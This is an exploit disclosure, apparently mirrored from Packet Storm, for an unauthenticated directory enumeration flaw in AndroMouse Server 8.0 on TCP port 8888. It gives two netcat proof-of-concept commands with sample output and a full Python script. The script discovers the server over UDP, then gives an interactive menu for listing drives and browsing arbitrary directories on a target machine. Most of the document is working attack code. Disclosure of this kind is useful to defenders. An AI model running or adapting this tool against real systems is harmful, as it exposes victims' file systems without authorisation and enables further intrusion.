📄 AndroMouse Server 8.0 Unauthenticated Directory Enumeration

🗓️ 04 Jul 2025 00:00:00Reported by Chokri HammediType
packetstorm🔗 packetstorm.news👁 100 Views
AndroMouse Server 8.0 exposes unauthenticated directory listing on port 8888 via file_browser_root and file_browser|<dir>.
# Exploit Title: AndroMouse Server 8.0 – Unauthenticated Directory
    Enumeration
    # Date: 03/07/25
    # Exploit Author: Chokri Hammedi
    # Vendor Homepage: http://andromouse.com
    # Software Link: https://andromouse-server.en.lo4d.com/windows
    # Version: 8.0
    # Tested on: Windows 10
    
    r'''
    Description:
    
    AndroMouse Server 8.0 exposes an unauthenticated TCP command interface on
    port 8888. A remote attacker can send crafted commands such as
    file_browser_root and file_browser|<directory> to enumerate the contents of
    arbitrary directories on the host file system, without user interaction or
    authentication.
    
    POC 1:
    
    echo -e "file_browser_root\n" | nc 192.168.8.104 8888
    file_browser_root|C:\|F:\
    
    POC 2:
    echo -e "file_browser|C:\Users\public\\n" | nc 192.168.8.104 8888
    file_browser | C:\Users\public |  |
    |Documents|Downloads|Music|Pictures|Videos
    
    '''
    
    
    import socket
    import time
    
    try:
        import readline
    except ImportError:
        try:
            import pyreadline as readline
        except ImportError:
            readline = None
    
    TARGET_IP = "192.168.8.104"
    UDP_PORT = 8888
    TCP_PORT = 8888
    NEWLINE = b"\x0a"
    
    def establish_udp_connection():
        sock = socket.socket(socket.AF_INET, socket.SOCK_DGRAM)
        try:
            sock.sendto(b"connection_detect_server" + NEWLINE, (TARGET_IP,
    UDP_PORT))
            time.sleep(1)
            sock.sendto(b"connection_detect_server" + NEWLINE, (TARGET_IP,
    UDP_PORT))
            time.sleep(1)
        finally:
            sock.close()
    
    def tcp_connect():
        while True:
            try:
                sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
                sock.settimeout(10)
                sock.connect((TARGET_IP, TCP_PORT))
                return sock
            except Exception as e:
                print(f"[!] TCP connection failed: {e}. Retrying in 3s...")
                time.sleep(3)
                establish_udp_connection()
    
    def send_command(sock, command):
        try:
            sock.sendall(command.encode() + NEWLINE)
            time.sleep(0.5)
            response = sock.recv(4096).decode(errors="ignore").strip()
            return response
        except (socket.timeout, ConnectionError, OSError) as e:
            raise e
    
    def list_drives(sock):
        response = send_command(sock, "file_browser_root")
    
    
        if "file_browser_root|" in response:
            drives = [d.strip() for d in response.split("|")[1:] if d.strip()]
            print("\nAvailable Drives:")
            for drive in drives:
                print(f" {drive}\\")
            return drives
        print("No drives found")
        return []
    
    def list_directory(sock, path):
        response = send_command(sock, f"file_browser|{path}")
    
        if "file_browser |" in response:
            parts = [p.strip() for p in response.split("|")]
            if len(parts) >= 4:
                current_path = parts[1]
                all_items = [item for item in parts[3:] if item.strip()]
    
                folders = []
                files = []
                for item in all_items:
                    if '.' in item.split('\\')[-1]:
                        files.append(item)
                    else:
                        folders.append(item)
    
                print(f"\nContents of {current_path}\n")
                for folder in folders:
                    print(f"<dir>  {folder}")
                for file in files:
                    print(f"<file> {file}")
                print(f"\nTotal: {len(files)} files, {len(folders)}
    directories")
                return folders + files
    
        print("Directory not found or access denied")
        return []
    
    def interactive_shell():
        establish_udp_connection()
        sock = tcp_connect()
    
        if readline:
            readline.parse_and_bind("tab: complete")
            readline.parse_and_bind("set editing-mode emacs")
            readline.parse_and_bind("set history-preserve-point on")
    
        while True:
            try:
                print("\n1. List drives\n2. Browse directory\n3. Exit")
                choice = input("> ").strip()
    
                if readline and choice:
                    readline.add_history(choice)
    
                if choice == "1":
                    list_drives(sock)
                elif choice == "2":
                    path = input("Enter path (e.g. C:\\): ").strip()
                    if path:
                        if not path.endswith("\\"):
                            path += "\\"
                        list_directory(sock, path)
                elif choice == "3":
                    break
            except (socket.timeout, ConnectionError, OSError) as e:
                print(f"[!] Connection lost: {e}. Reconnecting...")
                try:
                    sock.close()
                except:
                    pass
                establish_udp_connection()
                sock = tcp_connect()
            except Exception as e:
                print(f"[!] Unexpected error: {e}")
                try:
                    sock.close()
                except:
                    pass
                break
    
        try:
            sock.close()
        except:
            pass
        print("[✓] Session ended.")
    
    if __name__ == "__main__":
        interactive_shell()
04 Jul 2025 00:00Current
8High risk
Vulners AI Score8